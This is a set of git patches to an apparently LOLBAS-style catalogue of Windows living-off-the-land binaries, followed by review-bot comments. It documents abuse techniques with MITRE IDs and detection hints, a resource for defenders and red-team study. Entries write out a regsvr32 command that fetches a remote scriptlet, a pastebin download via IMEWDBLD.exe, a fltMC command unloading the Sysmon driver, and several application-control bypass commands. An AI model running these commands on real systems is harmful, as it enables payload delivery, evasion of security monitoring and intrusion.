From: SpookySec Date: Mon, 8 Feb 2021 16:28:25 +0300 Subject: [PATCH 22/32] edited cdb.yml --- yml/OtherMSBinaries/Cdb.yml | 17 ++++++++++++++++- 1 file changed, 16 insertions(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index 2411a0d..a5edabc 100644 --- a/yml/OtherMSBinaries/Cdb.yml 
+++ b/yml/OtherMSBinaries/Cdb.yml @@ -12,6 +12,16 @@ Commands: MitreID: T1218 MitreLink: https://attack.mitre.org/wiki/Technique/T1218 OperatingSystem: Windows + - Command: | + cdb.exe -pd -pn + .shell + Description: Attaching to any process and executing shell commands + Usecase: Run a shell command under a trusted Microsoft signed binary + Category: Execute + Privileges: User + MitreID: + MitreLink: + OperatingSystem: Windows Full_Path: - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x64\cdb.exe - Path: C:\Program Files (x86)\Windows Kits\10\Debuggers\x86\cdb.exe @@ -23,7 +33,12 @@ Resources: - Link: http://www.exploit-monday.com/2016/08/windbg-cdb-shellcode-runner.html - Link: https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/cdb-command-line-options - Link: https://gist.github.com/mattifestation/94e2b0a9e3fe1ac0a433b5c3e6bd0bda + - Link: https://blog.thecybersecuritytutor.com/the-power-of-cdb-debugging-tool/ Acknoledgement: - Person: Matt Graeber Handle: '@mattifestation' ---- \ No newline at end of file + - Person: mr.d0x + Handle: '@mrd0x' + - Person: Spooky Sec + Handle: '@spooky_sec' +--- From d539a7dacd33bdcb7bde8056dedcb5f86ceab4de Mon Sep 17 00:00:00 2001 From: SpookySec Date: Fri, 12 Feb 2021 22:26:16 +0300 Subject: [PATCH 23/32] edited cdb.yml --- yml/OtherMSBinaries/Cdb.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/Cdb.yml b/yml/OtherMSBinaries/Cdb.yml index a5edabc..32830c2 100644 --- a/yml/OtherMSBinaries/Cdb.yml +++ b/yml/OtherMSBinaries/Cdb.yml @@ -40,5 +40,5 @@ Acknoledgement: - Person: mr.d0x Handle: '@mrd0x' - Person: Spooky Sec - Handle: '@spooky_sec' + Handle: '@sec_spooky' --- From 782bc68c7cb77073caf2fb0817fad31461cf9597 Mon Sep 17 00:00:00 2001 
From: whickey-r7 <32334421+whickey-r7@users.noreply.github.com> Date: Fri, 5 Mar 2021 11:35:06 -0500 Subject: [PATCH 24/32] Create IMEWDBLD.yml --- yml/OSBinaries/IMEWDBLD.yml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 yml/OSBinaries/IMEWDBLD.yml diff --git a/yml/OSBinaries/IMEWDBLD.yml b/yml/OSBinaries/IMEWDBLD.yml new file mode 100644 index 0000000..e1167c1 --- /dev/null +++ b/yml/OSBinaries/IMEWDBLD.yml @@ -0,0 +1,22 @@ +--- +Name: IMEWDBLD.exe +Description: Microsoft IME Open Extended Dictionary Module +Author: 'Wade Hickey' +Created: '2020-03-05' +Commands: + - Command: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe https://pastebin.com/raw/tdyShwLw + Description: IMEWDBLD.exe attempts to load a dictionary file, if provided a URL as an argument, it will download the file served at by that URL and save it to %LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/[1]. or %LocalAppData%\Microsoft\Windows\INetCache\IE\<8_RANDOM_ALNUM_CHARS>/[1]. + Usecase: Download file from Internet + Category: Download + Privileges: User + MitreID: T1105 + MitreLink: https://attack.mitre.org/wiki/Technique/T1105 + OperatingSystem: Windows 10 +Full_Path: + - Path: C:\Windows\System32\IME\SHARED\IMEWDBLD.exe +Resources: + - Link: https://twitter.com/notwhickey/status/1367493406835040265 +Acknowledgement: + - Person: Wade Hickey + Handle: '@notwhickey' +--- From bbf14cf4b9ed7d9e2c680632590551bb9972095c Mon Sep 17 00:00:00 2001 From: Parker McGee <232132+pgmcgee@users.noreply.github.com> Date: Sat, 20 Mar 2021 16:40:37 -0400 Subject: [PATCH 25/32] Fix a typo in Findstr.yml `finstr.exe` should be `findstr.exe` --- yml/OSBinaries/Findstr.yml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/yml/OSBinaries/Findstr.yml b/yml/OSBinaries/Findstr.yml index 95668b9..35f823c 100644 --- a/yml/OSBinaries/Findstr.yml +++ b/yml/OSBinaries/Findstr.yml 
@@ -42,11 +42,11 @@ Full_Path: Code_Sample: - Code: Detection: - - IOC: finstr.exe should normally not be invoked on a client system + - IOC: findstr.exe should normally not be invoked on a client system Resources: - Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/ - Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f Acknowledgement: - Person: Oddvar Moe Handle: '@oddvarmoe' ---- \ No newline at end of file +--- From ebf494ae4debab34e6f1d92d6613792ba79fbcb5 Mon Sep 17 00:00:00 2001 From: Efraim-Kaplan <54638674+Efraim-Kaplan@users.noreply.github.com> Date: Fri, 2 Jul 2021 17:33:53 -0400 Subject: [PATCH 26/32] FIxed typo Replaced "handeling" with "handling". --- yml/OSBinaries/Certutil.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Certutil.yml b/yml/OSBinaries/Certutil.yml index d66a264..414e531 100644 --- a/yml/OSBinaries/Certutil.yml +++ b/yml/OSBinaries/Certutil.yml @@ -1,6 +1,6 @@ --- Name: Certutil.exe -Description: Windows binary used for handeling certificates +Description: Windows binary used for handling certificates Author: 'Oddvar Moe' Created: '2018-05-25' Commands: From 87c3319ad4797c1160b259f82fcb0330fa312816 Mon Sep 17 00:00:00 2001 From: Josh Brower Date: Tue, 6 Jul 2021 13:56:24 -0400 Subject: [PATCH 27/32] Fix ART link --- yml/OSBinaries/Cmd.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OSBinaries/Cmd.yml b/yml/OSBinaries/Cmd.yml index 1fc9f9f..a951c7a 100644 --- a/yml/OSBinaries/Cmd.yml +++ b/yml/OSBinaries/Cmd.yml 
@@ -4,7 +4,7 @@ Description: The command-line interpreter in Windows Author: 'Ye Yint Min Thu Htut' Created: '2019-06-26' Commands: - - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat + - Command: cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.010/src/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat Description: Add content to an Alternate Data Stream (ADS). Usecase: Can be used to evade defensive countermeasures or to hide as a persistence mechanism Category: ADS From ecbc2f817f20c8687cdd0c3a60a584004958f751 Mon Sep 17 00:00:00 2001 From: John Lambert Date: Sat, 18 Sep 2021 17:43:59 -0700 Subject: [PATCH 28/32] Add lolbin for fltMC.exe Used by redteams for defense evasion to disable drivers used by agents like sysmon https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon https://github.com/oddcod3/Phantom-Evasion/blob/master/Modules/post-exploitation/Postex_CMD_UnloadSysmonDriver_windows.py --- yml/OSBinaries/fltMC.yml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OSBinaries/fltMC.yml diff --git a/yml/OSBinaries/fltMC.yml b/yml/OSBinaries/fltMC.yml new file mode 100644 index 0000000..c22696a --- /dev/null +++ b/yml/OSBinaries/fltMC.yml 
@@ -0,0 +1,26 @@ +--- +Name: fltMC.exe +Description: Filter Manager Control Program used by Windows +Author: 'John Lambert' +Created: '2021-09-18' +Commands: + - Command: fltMC.exe unload SysmonDrv + Description: Unloads a driver used by security agents + Usecase: Defense evasion + Category: ADS + Privileges: Admin + MitreID: T1562 + MitreLink: https://attack.mitre.org/techniques/T1562/002/ + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 +Full_Path: + - Path: C:\Windows\System32\fltMC.exe +Code_Sample: +- Code: +Detection: + - IOC: 4688 events with fltMC.exe +Resources: + - Link: https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon +Acknowledgement: + - Person: Carlos Perez + Handle: '@Carlos_Perez' +--- From 559d9bc3ff0969f450ec2adb8423f63a25b8e7fe Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Fri, 24 Sep 2021 15:28:01 +0800 Subject: [PATCH 29/32] Create VSIISExeLauncher.yml --- yml/OtherMSBinaries/VSIISExeLauncher.yml | 26 ++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 yml/OtherMSBinaries/VSIISExeLauncher.yml diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml new file mode 100644 index 0000000..5c92f3d --- /dev/null +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml 
@@ -0,0 +1,26 @@ +--- +Name: VSIISExeLauncher.exe +Description: Binary will execute specified binary. Part of VS/VScode installation. +Author: 'timwhite' +Created: '2021-09-24' +Commands: + - Command: VSIISExeLauncher.exe -p [PATH_TO_BIN] -a "argument here" + Description: The above binary will execute other binary. + Usecase: Execute any binary with given arguments. + Category: Execute + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 and up with VS/VScode installed +Full_Path: + - Path: 'C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\Extensions\Microsoft\Web Tools\ProjectSystem\VSIISExeLauncher.exe' +Code_Sample: + - Code: +Detection: + - IOC: VSIISExeLauncher.exe spawned an unknown process +Resources: + - Link: +Acknowledgement: + - Person: timwhite + Handle: +--- From 9336b4d599c241d86720a6e9b833f9dc173d4cd4 Mon Sep 17 00:00:00 2001 From: TimWhite <36320909+timwhitez@users.noreply.github.com> Date: Fri, 24 Sep 2021 15:28:39 +0800 Subject: [PATCH 30/32] Update VSIISExeLauncher.yml --- yml/OtherMSBinaries/VSIISExeLauncher.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/yml/OtherMSBinaries/VSIISExeLauncher.yml b/yml/OtherMSBinaries/VSIISExeLauncher.yml index 5c92f3d..33d36a5 100644 --- a/yml/OtherMSBinaries/VSIISExeLauncher.yml +++ b/yml/OtherMSBinaries/VSIISExeLauncher.yml @@ -19,7 +19,7 @@ Code_Sample: Detection: - IOC: VSIISExeLauncher.exe spawned an unknown process Resources: - - Link: + - Link: https://github.com/timwhitez Acknowledgement: - Person: timwhite Handle: From b5357cdec00bbfe4e714fa227da2230a27d70918 Mon Sep 17 00:00:00 2001 
From: root Date: Sun, 26 Sep 2021 23:31:30 -0400 Subject: [PATCH 31/32] Adding app-ctrl bypass bins and a few lolscripts --- yml/OSBinaries/Aspnet_Compiler.yml | 28 ++++++++++++++ yml/OSBinaries/Msbuild.yml | 12 ++++++ yml/OSScripts/CL_LoadAssembly.yml | 30 +++++++++++++++ yml/OSScripts/UtilityFunctions.yml | 26 +++++++++++++ yml/OtherMSBinaries/Fsi.yml | 38 +++++++++++++++++++ yml/OtherMSBinaries/FsiAnyCpu.yml | 36 ++++++++++++++++++ yml/OtherMSBinaries/VisualUiaVerifyNative.yml | 31 +++++++++++++++ yml/OtherMSBinaries/Wfc.yml | 28 ++++++++++++++ 8 files changed, 229 insertions(+) create mode 100644 yml/OSBinaries/Aspnet_Compiler.yml create mode 100644 yml/OSScripts/CL_LoadAssembly.yml create mode 100644 yml/OSScripts/UtilityFunctions.yml create mode 100644 yml/OtherMSBinaries/Fsi.yml create mode 100644 yml/OtherMSBinaries/FsiAnyCpu.yml create mode 100644 yml/OtherMSBinaries/VisualUiaVerifyNative.yml create mode 100644 yml/OtherMSBinaries/Wfc.yml diff --git a/yml/OSBinaries/Aspnet_Compiler.yml b/yml/OSBinaries/Aspnet_Compiler.yml new file mode 100644 index 0000000..7cbd821 --- /dev/null +++ b/yml/OSBinaries/Aspnet_Compiler.yml 
@@ -0,0 +1,28 @@ +--- +Name: Aspnet_Compiler.exe +Description: ASP.NET Compilation Tool +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe -v none -p C:\users\cpl.internal\desktop\asptest\ -f C:\users\cpl.internal\desktop\asptest\none -u + Description: Execute C# code with the Build Provider and proper folder structure in place. + Usecase: Execute proxied payload with Microsoft signed binary to bypass application control solutions + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 +Full_Path: + - Path: c:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe + - Path: c:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe +Code_Sample: + - Code: https://github.com/ThunderGunExpress/BringYourOwnBuilder +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://ijustwannared.team/2020/08/01/the-curious-case-of-aspnet_compiler-exe/ + - Link: https://docs.microsoft.com/en-us/dotnet/api/system.web.compilation.buildprovider.generatecode?view=netframework-4.8 +Acknowledgement: + - Person: cpl + Handle: '@cpl3h' +--- \ No newline at end of file diff --git a/yml/OSBinaries/Msbuild.yml b/yml/OSBinaries/Msbuild.yml index b5bfbe5..5b4deca 100644 --- a/yml/OSBinaries/Msbuild.yml +++ b/yml/OSBinaries/Msbuild.yml 
@@ -20,6 +20,14 @@ Commands: MitreID: T1127 MitreLink: https://attack.mitre.org/wiki/Technique/T1127 OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 + - Command: msbuild.exe project.proj + Description: Execute jscript/vbscript code through XML/XSL Transformation. Requires Visual Studio MSBuild v14.0+. + Usecase: Execute project file that contains XslTransformation tag parameters + Category: Execute + Privileges: User + MitreID: T1127 + MitreLink: https://attack.mitre.org/wiki/Technique/T1127 + OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10 Full_Path: - Path: C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe @@ -27,6 +35,7 @@ Full_Path: - Path: C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe - Path: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe + - Path: C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe Code_Sample: - Code: Detection: @@ -36,9 +45,12 @@ Resources: - Link: https://github.com/Cn33liz/MSBuildShell - Link: https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ - Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ + - Link: https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191 Acknowledgement: - Person: Casey Smith Handle: '@subtee' - Person: Cn33liz Handle: '@Cneelis' + - Person: Jimmy + Handle: '@bohops' --- \ No newline at end of file diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml new file mode 100644 index 0000000..4bc7719 --- /dev/null +++ b/yml/OSScripts/CL_LoadAssembly.yml 
@@ -0,0 +1,30 @@ +--- +Name: CL_LoadAssembly.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: '”powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; LoadAssemblyFromPath ..\..\..\..\testing\fun.dll;[Program]::Fun()' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1059.001 + MitreLink: https://attack.mitre.org/techniques/T1059/001/ + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Audio\CL_LoadAssembly.ps1 +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ +Acknowledgement: + - Person: Jimmy + Handle: '@bohops' +--- + + + +powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; RegSnapin ..\..\..\..\testing\fun.dll;[Program.Class]::Fun() \ No newline at end of file diff --git a/yml/OSScripts/UtilityFunctions.yml b/yml/OSScripts/UtilityFunctions.yml new file mode 100644 index 0000000..8f92417 --- /dev/null +++ b/yml/OSScripts/UtilityFunctions.yml 
@@ -0,0 +1,26 @@ +--- +Name: UtilityFunctions.ps1 +Description: PowerShell Diagnostic Script +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: 'powershell.exe -command "set-location -path c:\windows\diagnostics\system\networking; import-module .\UtilityFunctions.ps1; RegSnapin ..\..\..\..\temp\unsigned.dll;[Program.Class]::Main()”' + Description: Proxy execute Managed DLL with PowerShell + Usecase: Execute proxied payload with Microsoft signed binary + Category: Execute + Privileges: User + MitreID: T1059.001 + MitreLink: https://attack.mitre.org/techniques/T1059/001/ + OperatingSystem: Windows 10 21H1 (likely other versions as well) +Full_Path: + - Path: C:\Windows\diagnostics\system\Networking\UtilityFunctions.ps1 +Code_Sample: + - Code: +Detection: + - IOC: +Resources: + - Link: https://twitter.com/nickvangilder/status/1441003666274668546 +Acknowledgement: + - Person: Nick VanGilder + Handle: '@nickvangilder' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Fsi.yml b/yml/OtherMSBinaries/Fsi.yml new file mode 100644 index 0000000..66f55f7 --- /dev/null +++ b/yml/OtherMSBinaries/Fsi.yml 
@@ -0,0 +1,38 @@ +--- +Name: Fsi.exe +Description: 64-bit FSharp (F#) Interpreter included with Visual Studio and DotNet Core SDK. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsi.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsi.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files\dotnet\sdk\[sdk version]\FSharp\fsi.exe + - Path: C:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsi.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://twitter.com/NickTyrer/status/904273264385589248 + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/FsiAnyCpu.yml b/yml/OtherMSBinaries/FsiAnyCpu.yml new file mode 100644 index 0000000..855f7d7 --- /dev/null +++ b/yml/OtherMSBinaries/FsiAnyCpu.yml 
@@ -0,0 +1,36 @@ +--- +Name: FsiAnyCpu.exe +Description: 32/64-bit FSharp (F#) Interpreter included with Visual Studio. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: fsianycpu.exe c:\path\to\test.fsscript + Description: Execute F# code via script file + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) + - Command: fsianycpu.exe + Description: Execute F# code via interactive command line + Usecase: Execute payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1059 + MitreLink: https://attack.mitre.org/techniques/T1059/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Microsoft Visual Studio\2019\Professional\Common7\IDE\CommonExtensions\Microsoft\FSharp\fsianycpu.exe +Code_Sample: + - Code: https://gist.github.com/NickTyrer/51eb8c774a909634fa69b4d06fc79ae1 +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Nick Tyrer + Handle: '@NickTyrer' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/VisualUiaVerifyNative.yml b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml new file mode 100644 index 0000000..dafea55 --- /dev/null +++ b/yml/OtherMSBinaries/VisualUiaVerifyNative.yml 
@@ -0,0 +1,31 @@ +--- +Name: VisualUiaVerifyNative.exe +Description: A Windows SDK binary for manual and automated testing of Microsoft UI Automation implementation and controls. +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: VisualUiaVerifyNative.exe + Description: Generate Serialized gadget and save to - C:\Users\[current user]\AppData\Roaminguiverify.config before executing. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\arm64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\x64\UIAVerify\VisualUiaVerifyNative.exe + - Path: c:\Program Files (x86)\Windows Kits\10\bin\[SDK version]\UIAVerify\VisualUiaVerifyNative.exe +Code_Sample: + - Code: +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/ + - Link: https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad +Acknowledgement: + - Person: Lee Christensen + Handle: '@tifkin' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file diff --git a/yml/OtherMSBinaries/Wfc.yml b/yml/OtherMSBinaries/Wfc.yml new file mode 100644 index 0000000..8542015 --- /dev/null +++ b/yml/OtherMSBinaries/Wfc.yml 
@@ -0,0 +1,28 @@ +--- +Name: Wfc.exe +Description: The Workflow Command-line Compiler tool is included with the Windows Software Development Kit (SDK). +Author: Jimmy (@bohops) +Created: 2021-09-26 +Commands: + - Command: wfc.exe c:\path\to\test.xoml + Description: Execute arbitrary C# code embedded in a XOML file. + Usecase: Execute proxied payload with Microsoft signed binary to bypass WDAC policies + Category: AWL Bypass + Privileges: User + MitreID: T1218 + MitreLink: https://attack.mitre.org/techniques/T1218/ + OperatingSystem: Windows 10 2004 (likely previous and newer versions as well) +Full_Path: + - Path: C:\Program Files (x86)\Microsoft SDKs\Windows\v10.0A\bin\NETFX 4.8 Tools\wfc.exe +Code_Sample: + - Code: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Detection: + - IOC: Sysmon Event ID 1 - Process Creation +Resources: + - Link: https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/ +Acknowledgement: + - Person: Matt Graeber + Handle: '@mattifestation' + - Person: Jimmy + Handle: '@bohops' +--- \ No newline at end of file From 741d0f7b360028191a04a3eac4ea4215cf53f635 Mon Sep 17 00:00:00 2001 From: bohops Date: Sun, 26 Sep 2021 23:35:01 -0400 Subject: [PATCH 32/32] Update CL_LoadAssembly.yml --- yml/OSScripts/CL_LoadAssembly.yml | 4 ---- 1 file changed, 4 deletions(-) diff --git a/yml/OSScripts/CL_LoadAssembly.yml b/yml/OSScripts/CL_LoadAssembly.yml index 4bc7719..81e37cd 100644 --- a/yml/OSScripts/CL_LoadAssembly.yml +++ b/yml/OSScripts/CL_LoadAssembly.yml @@ -24,7 +24,3 @@ Acknowledgement: - Person: Jimmy Handle: '@bohops' --- - - - -powershell.exe -command "set-location -path C:\Windows\diagnostics\system\Audio; import-module .\CL_LoadAssembly.ps1; RegSnapin ..\..\..\..\testing\fun.dll;[Program.Class]::Fun() \ No newline at end of file
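Review bot: In the Cdb.yml hunk that adds the `cdb.exe -pd -pn` / `.shell` entry, `MitreID:` and `MitreLink:` are left empty, while the entry directly above it in the same file carries T1218; fill both in so the new entry maps to a technique. The command shows `-pn` with nothing after it although the Description says it attaches to a process, and `.shell` with no command, so add placeholders for both. The context line still spells the key `Acknoledgement:` where the other files in this series use `Acknowledgement:`; worth correcting while this block is being touched.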
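Review bot: `Created: '2020-03-05'` in the new IMEWDBLD.yml (PATCH 24/32) is a year earlier than the commit date of 5 Mar 2021, which looks like a typo in the year. The Description mixes path separators in `INetCache\<8_RANDOM_ALNUM_CHARS>/[1].` and reads "served at by that URL". The file also has no `Detection:` section, although the Description already names the INetCache locations where a defender could watch for files written by IMEWDBLD.exe.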
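Review bot: `Category: ADS` in the new fltMC.yml (PATCH 28/32) does not fit the entry, whose own Usecase is `Defense evasion` and which involves no alternate data stream. `MitreID: T1562` and the link ending in `/T1562/002/` disagree on whether a sub-technique is meant; make the two consistent. The IOC `4688 events with fltMC.exe` could be narrowed to command lines containing `unload`, since that is the only action the entry documents. `- Code:` under `Code_Sample:` is not indented like the other lists in the file.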
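Review bot: The Description in the new VSIISExeLauncher.yml (PATCH 29/32) says the binary is part of a VS/VScode installation, but the only `Full_Path` is hard-coded to `Microsoft Visual Studio\2019\Community`; use version and edition placeholders or list the other locations. `Handle:` is empty, and `The above binary will execute other binary.` does not say what `-p` and `-a` mean.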
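Review bot: In PATCH 30/32 the `Resources` link is set to `https://github.com/timwhitez`, a profile page rather than a write-up or documentation of how VSIISExeLauncher.exe behaves; point it at something that documents the `-p`/`-a` behaviour, or leave it empty until such a reference exists. `Handle:` under Acknowledgement is still blank after this change.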
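Review bot: The Command in Aspnet_Compiler.yml (PATCH 31/32) embeds a contributor-specific path, `C:\users\cpl.internal\desktop\asptest\`, twice; replace it with a placeholder directory. `Created: 2021-09-26` is unquoted here and in the other files added by this patch, while earlier entries in the series quote the date (`Created: '2021-09-18'`). `IOC: Sysmon Event ID 1 - Process Creation` names a log source rather than an indicator; state what to look for in those events, for example aspnet_compiler.exe started with `-p` and `-f` pointing at user-writable directories.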
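Review bot: The Msbuild.yml entry added in PATCH 31/32 uses the old link form `https://attack.mitre.org/wiki/Technique/T1127`, while every new file in the same patch uses `https://attack.mitre.org/techniques/...`; use the current form for the new entry. The Description says the technique requires MSBuild v14.0+, but `OperatingSystem` still lists Windows Vista onward with no hint of that requirement, and the hunk adds no detection guidance for project files containing an XslTransformation tag.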
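Review bot: The Command value in CL_LoadAssembly.yml (PATCH 31/32) opens with `'”powershell.exe`, a stray typographic quote right after the YAML single quote, and the `"` following `-command` is never closed. The file also carries a second, unkeyed `powershell.exe ... RegSnapin ...` line after the closing `---`; PATCH 32/32 removes that trailing line but leaves the Command value as it is. `- IOC:` is empty.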
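Review bot: The Command in UtilityFunctions.yml (PATCH 31/32) closes with a typographic `”` while the quote opened after `-command` is an ASCII `"`, so the string is unbalanced as written; use `"` at both ends. `- IOC:` is empty even though the entry itself suggests one: powershell.exe importing UtilityFunctions.ps1 and calling `RegSnapin` on a DLL outside the diagnostics directory.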
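Review bot: FsiAnyCpu.yml (PATCH 31/32) gives a single `Full_Path` hard-coded to `Microsoft Visual Studio\2019\Professional`, whereas Fsi.yml in the same patch already uses a `[sdk version]` placeholder for its dotnet path; use placeholders for version and edition in both files. Both files give `Sysmon Event ID 1 - Process Creation` as the only IOC, which names a log source rather than an indicator; say which image names and parent processes are worth alerting on.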
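Review bot: The Description path in VisualUiaVerifyNative.yml (PATCH 31/32), `C:\Users\[current user]\AppData\Roaminguiverify.config`, is missing the separator between `Roaming` and `uiverify.config`. The Command is the bare binary name, so the Description should also say how that config file relates to the run; "before executing" leaves the connection implicit. The IOC could then name the config file itself, since its creation or modification is the observable step.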